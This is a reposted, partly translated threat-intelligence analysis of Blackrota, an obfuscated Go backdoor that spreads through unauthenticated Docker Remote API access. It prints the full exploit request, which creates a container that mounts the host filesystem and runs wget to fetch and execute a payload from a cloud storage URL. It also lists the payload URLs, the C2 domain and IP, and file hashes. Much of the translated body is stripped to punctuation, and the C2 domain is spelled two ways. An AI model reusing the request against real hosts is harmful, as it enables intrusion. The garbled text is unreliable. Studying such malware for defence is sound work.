Clever Geek Handbook

Blackrota, a heavily obfuscated backdoor written in Go

The most obfuscated Go ELF malware we've seen to date.





Foreword

Recently, a malicious backdoor written in Go that exploited an unauthorized access vulnerability in the Docker Remote API was caught on the Anglerfish Honeypot.





We named it Blackrota because its C2 domain is blackrota.ga .





The Blackrota backdoor is currently available only for Linux, in ELF format and supports x86 / x86-64 architectures.





Blackrota is configured and compiled based on geacon - the CobaltStrike Beacon Go implementation used as a CobaltStrike Beacon, which interacts with CobaltStrike to control a compromised host:





However, this is only an implementation of some of the key features of the original CobaltStrike Beacon:





  • CMD_SHELL: execution of Shell commands,





  • CMD_UPLOAD: upload files,





  • CMDDOWNLOAD: download special files,





  • CMD_FILE _ ROWSE: view the file,





  • CMD_CD: change directory,





  • CMD_SLEEP: set sleep delay time,





  • CMD_PWD: return the current directory,





  • CMD_EXIT: exit.





geacon, Blackrota gobfuscate - . Gobfuscate - Go-, Go- :





  • ;





  • ;





  • ;





  • ;





  • .





, gobfuscate XOR , XOR, .





Go . , , , , . , , , Go . , Go.





, Go : RTSI (Runtime Symbol Information) RTTI (Runtime Type Information) . , Go, , Go. Go . , RTSI RTTI , , .





Blackrota gobfuscate , "life-door" . , , . .





, Go, , - , . Blackrota - Go ELF , .





Blackrota





Blackrota API Docker. :





POST /v1.37/containers/create HTTP/1.1
Host: {target_host}:{target_port}
User-Agent: Docker-Client/19.03.7 (linux)
Content-Length: 1687
Content-Type: application/json

{"Env":[],"Cmd":["/bin/sh","-c","rm ./32 ; wget https://semantixpublic.s3.amazonaws.com/itau-poc-elastic/32;chmod 777 32; nohup ./32 \u003c/dev/null \u003e/dev/null 2\u003e\u00261 \u0026"],"Image":"alpine","Volumes":{},"WorkingDir":"","HostConfig":{"Binds":["/:/mnt"]}

32/64 Blackrota URL :





https://semantixpublic.s3.amazonaws.com/itau-poc-elastic/32
https://semantixpublic.s3.amazonaws.com/itau-poc-elastic/64

Blackrota

, Blackrota Go. go_parser IDAPro, , Go1.15.3, GOROOT path "/usr/local/Cellar/ go/1.15.3/libexec". , , , , , , .





, ( )





/var/folders/m_/s3tbbryj529_gr23z27b769h0000gn/T/762993410/src/ammopppfcdmmecpgbkkj/mmkgdoebocpnpabeofch/main.go
/var/folders/m_/s3tbbryj529_gr23z27b769h0000gn/T/762993410/src/ammopppfcdmmecpgbkkj/mmkgdoebocpnpabeofch/ohbafagkhnajkninglhh/http.go
/var/folders/m_/s3tbbryj529_gr23z27b769h0000gn/T/762993410/src/ammopppfcdmmecpgbkkj/mmkgdoebocpnpabeofch/ohbafagkhnajkninglhh/packet.go
/var/folders/m_/s3tbbryj529_gr23z27b769h0000gn/T/762993410/src/ammopppfcdmmecpgbkkj/mmkgdoebocpnpabeofch/ohbafagkhnajkninglhh/commands.go
/var/folders/m_/s3tbbryj529_gr23z27b769h0000gn/T/762993410/src/ammopppfcdmmecpgbkkj/mmkgdoebocpnpabeofch/idkinfdjhbmgpdcnhdaa/sysinfo_linux.go
/var/folders/m_/s3tbbryj529_gr23z27b769h0000gn/T/762993410/src/ammopppfcdmmecpgbkkj/mmkgdoebocpnpabeofch/idkinfdjhbmgpdcnhdaa/meta.go
/var/folders/m_/s3tbbryj529_gr23z27b769h0000gn/T/762993410/src/knbgkjnkjabhokjgieap/djcomehocodednjcklap/ocphjmehllnbcjicmflh/setting.go
/var/folders/m_/s3tbbryj529_gr23z27b769h0000gn/T/762993410/src/knbgkjnkjabhokjgieap/djcomehocodednjcklap/ocphjmehllnbcjicmflh/req.go
/var/folders/m_/s3tbbryj529_gr23z27b769h0000gn/T/762993410/src/knbgkjnkjabhokjgieap/djcomehocodednjcklap/ocphjmehllnbcjicmflh/resp.go
/var/folders/m_/s3tbbryj529_gr23z27b769h0000gn/T/762993410/src/knbgkjnkjabhokjgieap/djcomehocodednjcklap/ocphjmehllnbcjicmflh/dump.go
/var/folders/m_/s3tbbryj529_gr23z27b769h0000gn/T/762993410/src/ammopppfcdmmecpgbkkj/mmkgdoebocpnpabeofch/pmdjfejhfmifhmelifpm/util.go
/var/folders/m_/s3tbbryj529_gr23z27b769h0000gn/T/762993410/src/ammopppfcdmmecpgbkkj/mmkgdoebocpnpabeofch/aooeabfbhioognpciekk/rsa.go
/var/folders/m_/s3tbbryj529_gr23z27b769h0000gn/T/762993410/src/ammopppfcdmmecpgbkkj/mmkgdoebocpnpabeofch/aooeabfbhioognpciekk/rand.go
/var/folders/m_/s3tbbryj529_gr23z27b769h0000gn/T/762993410/src/ammopppfcdmmecpgbkkj/mmkgdoebocpnpabeofch/aooeabfbhioognpciekk/aes.go
/var/folders/m_/s3tbbryj529_gr23z27b769h0000gn/T/762993410/src/ammopppfcdmmecpgbkkj/mmkgdoebocpnpabeofch/eepmoknkdieemfhjjjgl/config.go

Blackrota

, , , , Blackrota .





:





:





, , , :





, , , Go , . , , , Blackrota geacon.





, Blackrota, :





  1. geacon Blackrota, ,





  2. idb2pat.py IDAPro (geacon.pat) geacon-,





  3. sigmake Flair Tools geacon (geacon.sig),





  4. geacon.sig Blackrota IDAPro, .





! , , , , geacon-, :





Blackrota

, , Go, Blackrota, geacon . , geacon.





, Blackrota XOR , , , . XOR. gobfuscate XOR , , , . XOR :





, , XOR XOR. , .





, Go, , , . - , @joakimkennedy, main:





main - :





- EKANS, , Blackrota:





The obfuscation technique used in the Blackrota and EKANS malware creates new calls / problems for disassembly. As the Go language becomes more popular and more and more malware is written in Go in the future, we'll keep an eye on what happens.





IoCs





MD5:





e56e4a586601a1130814060cb4bf449b
6e020db51665614f4a2fd84fb0f83778
9ca7acc98c17c6b67efdedb51560e1fa

C&C:





blackrato.ga    165.227.199.214    ASN: 14061|DigitalOcean,_LLC

PS The article was published with the permission of the author. My first translation, please treat with understanding.







More articles:


All Articles